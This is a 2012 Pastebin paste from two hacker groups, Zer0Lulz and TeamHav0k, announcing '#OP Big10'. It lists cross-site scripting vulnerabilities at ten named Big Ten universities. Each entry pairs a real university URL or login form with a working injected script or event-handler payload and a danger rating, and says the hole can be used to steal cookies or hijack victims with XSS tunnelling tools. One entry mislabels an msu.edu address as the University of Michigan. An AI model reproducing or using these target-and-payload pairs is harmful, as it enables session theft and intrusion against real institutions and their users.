API tools faq
paste
Advertisement
Guest User

Zer0Lulz&TeamHav0k -#OP Big10 or "Big10P"

a guest
Feb 24th, 2012
77
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.55 KB | None | 0 0
raw download clone embed print report
  1. Target: The Big 10
  2.  
  3. Zer0Lulz & TeamHav0k - #OP Big10 or "Big10P"
  4.  
  5. "Big10P was an operation to make colleges and universities aware that even the best colleges in the world are still insecure"
  6.  
  7. --------
  8.  
  9. Northwestern uinv
  10. offices.northwestern.edu/search?search_terms="><script>alert('Big10P')</script>&submit=Search
  11. Danger Level: High
  12. Usage: Can be used to steal cookies, claim XSS Tunnel or XSSF victims.
  13.  
  14. Purdue univ
  15. https://www2.itap.purdue.edu/msds/
  16. input into searchbar: <script>alert("Big1OP)</script>
  17. Danger Level: High
  18. Usage: Can be used to steal cookies, claim XSS Tunnel or XSSF victims.
  19.  
  20. University of Illinois
  21. https://www-s2.education.illinois.edu/intranet/usrmgr/login/default.asp
  22. Syntax: use, "><script>alert(String.fromCharCode(66,105,103,49,79,80))</script> in the login boxes
  23. Danger Level: Low
  24. Usage: non
  25.  
  26. University of Michigan
  27. https://contact.cl.msu.edu/contact.php?service=msuweb
  28. Syntax: Use, </span><input type="text" AUTOFOCUS onfocus=alert(&quot;1&quot;)> then submit the form.
  29. Danger Level: High
  30. Usage: Could be used to steal the cookies of who ever views the report.
  31.  
  32. Penn State
  33. http://www.events.psu.edu/cgi-bin/cal/webevent.cgi?cmd=login&ncmd=XSS" /><img src=1 onerror=alert(String.fromCharCode(88,83,83,32,66,121,32,83,113,117,105,114,109,121,66,101,97,115,116)) />
  34. Danger Level: High
  35. Usage: Can be used to steal cookies, claim XSS Tunnel or XSSF victims.
  36.  
  37. University of Minnesota
  38. http://www.umn.edu/lookup?SET_INSTITUTION=UMNTC&CN=Test"><script>alert("Big1OP")</script>&type=name&campus=a&role=any&submit=Search+people
  39. Danger Level: High
  40. Usage: Can be used to steal cookies, claim XSS Tunnel or XSSF victims.
  41.  
  42. University of Wisconsin
  43. http://www.wisc.edu/search/?cx=001601028090761970182:2g0iwqsnk2m&cof=FORID:10&q=HIII"+AUTOFOCUS+onfocus=alert("Big1OP")>
  44. Danger Level: High
  45. Usage: Can be used to steal cookies, claim XSS Tunnel or XSSF victims.
  46.  
  47. Ohio State
  48. Target: https://directory.osu.edu/findpeople.php
  49. Syntax: </span><input type="text" AUTOFOCUS onfocus=alert(&quot;Big1OP&quot;)>
  50. Danger Level: Low
  51. Usage: None
  52.  
  53. University of Iowa
  54. https://login.uiowa.edu/uip/login.page?service=<script>alert("Big10P");</script>
  55. Danger Level: High
  56. Usage: Can be used to steal cookies, claim XSS Tunnel or XSSF victims.
  57.  
  58.  
  59. Indiana University
  60. http://search.kelley.iu.edu/search?q=<script>alert('Big10P')</script>&go.x=0&go.y=0&site=kelley_collection&client=kelley_collection&proxystylesheet=kelley_collection&restrict=&output=xml_no_dtd
  61. Danger Level: High
  62. Usage: Can be used to steal cookies, claim XSS Tunnel or XSSF victims.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!